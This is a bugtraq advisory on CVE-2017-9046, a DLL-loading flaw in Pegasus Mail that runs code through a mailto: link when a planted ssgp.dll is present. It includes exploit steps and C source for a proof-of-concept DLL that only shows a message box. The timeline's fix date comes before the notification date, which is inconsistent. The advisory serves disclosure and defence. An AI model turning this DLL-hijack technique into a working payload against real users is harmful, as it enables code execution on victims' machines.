'CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution
From:       apparitionsec () gmail ! com (hyp3rlinx)
Date:       2017-05-22 2:30:27
Message-ID: 201705220230.v4M2URm5000948 () sf01web3 ! securityfocus ! com
[Download RAW message or body]

[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
 [+] ISR: APPARITIONSEC            
 


Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable \
for use by single or multiple users on single computers or on local area networks. A \
proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an \
HTML "mailto:" link if a DLL named "ssgp.dll" exists on the victims Desktop. Tested \
successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click \
the  mailto: link arbitrary code executed and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install. 


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with \
"mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);  
    break;
  }

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.


Our code gets executed...



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=====================================
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties \
or guarantees of fitness of use or otherwise. Permission is hereby granted for the \
redistribution of this advisory, provided that it is not altered except by \
reformatting it, and that due credit is given. Permission is explicitly given for \
insertion in vulnerability databases and similar, provided that due credit is given \
to the author. The author is not responsible for any misuse of the information \
contained herein and accepts no responsibility for any damage caused by the use or \
misuse of this information. The author prohibits any malicious use of security \
related information or exploits by the author or elsewhere. All content (c).

hyp3rlinx


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic